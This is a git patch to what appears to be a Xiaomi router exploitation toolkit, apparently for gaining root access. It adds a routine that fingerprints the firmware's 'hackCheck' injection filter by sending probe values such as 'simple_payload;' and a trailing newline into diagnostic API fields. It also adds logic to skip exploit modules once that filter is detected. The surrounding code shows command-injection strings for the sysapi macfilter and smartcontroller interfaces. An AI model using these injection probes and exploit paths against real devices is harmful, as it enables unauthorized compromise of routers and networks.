From 755258d882ee19a0c099147534477a80ff8b12fc Mon Sep 17 00:00:00 2001 From: remittor Date: Thu, 6 Mar 2025 10:41:06 +0300 Subject: [PATCH] gateway: Add detecting version of hackCheck --- connect.py | 7 ++++++ connect5.py | 8 ++++--- gateway.py | 65 +++++++++++++++++++++++++++++++++++++++++++++-------- 3 files changed, 68 insertions(+), 12 deletions(-) diff --git a/connect.py b/connect.py index 62550ba..29dc722 100644 --- a/connect.py +++ b/connect.py @@ -51,6 +51,10 @@ if gw.model_id > 0 and gw.model_id < gw.get_modelid_by_name('R2100'): if True: # init gw and check ssh gw = create_gateway(timeout = 4, die_if_sshOk = True, die_if_ftpOk = True, web_login = True) + + hackCheck = gw.detect_hackCheck(update = True) + if hackCheck: + print(f'hackCheck version =', hackCheck) exp_modules = [ 'connect6', # arn_switch/start_binding @@ -60,6 +64,9 @@ if True: try: import_module(mod_name, gw) break # Ok + except ExploitFixed as e: + print('WARN:', str(e)) + continue # try next module except ExploitNotWorked as e: print('WARN:', str(e)) continue # try next module diff --git a/connect5.py b/connect5.py index 4046120..b514eec 100644 --- a/connect5.py +++ b/connect5.py @@ -54,7 +54,7 @@ int32_t run_sysapi_macfilter(char* mac, int32_t wan_block) """ vuln_cmd = "/usr/sbin/sysapi macfilter set mac=;; wan=no;/usr/sbin/sysapi macfilter commit" max_cmd_len = 100 - 1 - len(vuln_cmd) -hackCheck = False +hackCheck = gw.detect_hackCheck() def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'): ###### @@ -220,11 +220,13 @@ def exec_cmd(command, fn = '/tmp/e', run_as_sh = True): exec_tiny_cmd(f"sh {fn}") +if hackCheck >= 3: + raise ExploitFixed(f'Exploits "Smartcontroller" are not usable (hackCheck:{hackCheck})') + # Test smartcontroller interface res = get_all_scenes() # Detect using hackCheck fix -hackCheck = False res = exec_smart_command("aaaaa;$", ignore_err_code = 2) if isinstance(res, dict): if res['msg'] != 'api not exists': @@ -232,7 +234,7 @@ if isinstance(res, dict): else: if 'Internal Server Error' in res: print(f'Detect using xiaoqiang "hackCheck" fix ;-)') - hackCheck = True + #hackCheck = 1 else: raise ExploitNotWorked(f'Smartcontroller return Error: {res}') diff --git a/gateway.py b/gateway.py index 167fcf6..92a5f16 100644 --- a/gateway.py +++ b/gateway.py @@ -31,6 +31,8 @@ from multiprocessing import shared_memory import xqmodel +class ExploitFixed(Exception): pass + class ExploitError(Exception): pass class ExploitNotWorked(Exception): pass @@ -79,6 +81,7 @@ class Gateway(): self.login = 'root' # default username self.user_agent = "curl/8.4.0" self.last_resp_text = None + self.hackCheck = None def __init__(self, timeout = 4, verbose = 2, detect_device = True, detect_ssh = True, load_cfg = True): random.seed() @@ -145,7 +148,7 @@ class Gateway(): try: dres = json.loads(response.text) except Exception: - raise RuntimeError(f'Received inccorrect JSON from "{path}" => {response.text}') + raise RuntimeError(f'Received incorrect JSON from "{path}" => {response.text}') return dres return response #return response.status_code, response.content @@ -357,18 +360,62 @@ class Gateway(): resp = self.get_diag_paras(timeout = timeout) return str(resp['iperf_test_thr']) - def set_diag_iperf_test_thr(self, iperf_test_thr, timeout = None): + def set_diag_paras(self, iperf_test_thr=20, usb_read_thr=0, usb_write_thr=0, disk_read_thr=0, disk_write_thr=0, timeout=None): params = { 'iperf_test_thr': str(iperf_test_thr), - 'usb_read_thr': 0, - 'usb_write_thr': 0, - 'disk_read_thr': 0, - 'disk_write_thr': 0, + 'usb_read_thr': str(usb_read_thr), + 'usb_write_thr': str(usb_write_thr), + 'disk_read_thr': str(disk_read_thr), + 'disk_write_thr': str(disk_write_thr), } dres = self.api_request('API/xqnetwork/diag_set_paras', params, timeout = timeout) - if not dres or dres['code'] != 0: - raise RuntimeError(f'Error on exec command "diag_set_paras" => {dres}') - return True + if not dres: + err = f'Error on exec command "diag_set_paras" => {dres} (status:{self.last_resp_code})' + if self.last_resp_code == 500: # Internal Server Error + raise EOFError(err) + raise RuntimeError(err) + return dres['code'] # 0 if OK + + def set_diag_iperf_test_thr(self, value, timeout = None): + code = self.set_diag_paras(iperf_test_thr = value, timeout = timeout) + return True if code == 0 else False + + hackCheck_skipKeys_v1 = [ "ssid", "pwd", "password", "username" ] + + hackCheck_skipKeys_v2 = [ + "name", "password", "password5g", "password5g2", "npassword", "pppoeName", + "pppoePwd", "pwd", "pwd1", "pwd2", "pwd3", "newPwd", "service", "ssid", "ssid1", "ssid2", "ssid3", + "ssid5g", "ssid5g2", "nssid", "nssid5G", "nssid5G2", "username", "apn", "pdp", "user", "passwd", + "contact_phone", "phoneList", "msgtext", "acs_username", "acs_password", "conn_username", "conn_password", + ] + + def detect_hackCheck(self, update = False): + if not update and self.hackCheck is not None: + return self.hackCheck + self.hackCheck = 0 + self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 0, usb_read_thr = 0) + try: + code = self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 'simple_payload\n') + except EOFError: # Internal Server Error + self.hackCheck = 3 # XQSecureUtil.filterChars = "[=[\n[`;|$&\n]]=]" ; return nil + return self.hackCheck + try: + code = self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 'simple_payload;', usb_read_thr = 0) + except EOFError: # Internal Server Error + self.hackCheck = 2 # XQSecureUtil.filterChars = "[`;|$&]" ; return nil + return self.hackCheck + code = self.set_diag_paras(iperf_test_thr = 'simple_payload;', usb_write_thr = 11, usb_read_thr = 22) + if code != 0: + raise RuntimeError(f'Error on exec command "diag_set_paras" => code:{code} (status:{self.last_resp_code})') + diag_paras = self.get_diag_paras() + #print(f'diag_paras: {diag_paras}') + # restore def values + self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 0, usb_read_thr = 0) + if isinstance(diag_paras['iperf_test_thr'], int) and diag_paras['iperf_test_thr'] == 25: + self.hackCheck = 1 # XQSecureUtil.filterChars = "[`;|$&]" ; return '' + return self.hackCheck + # hackCheck not detected + return self.hackCheck def wait_shutdown(self, timeout, verbose = 1): if verbose: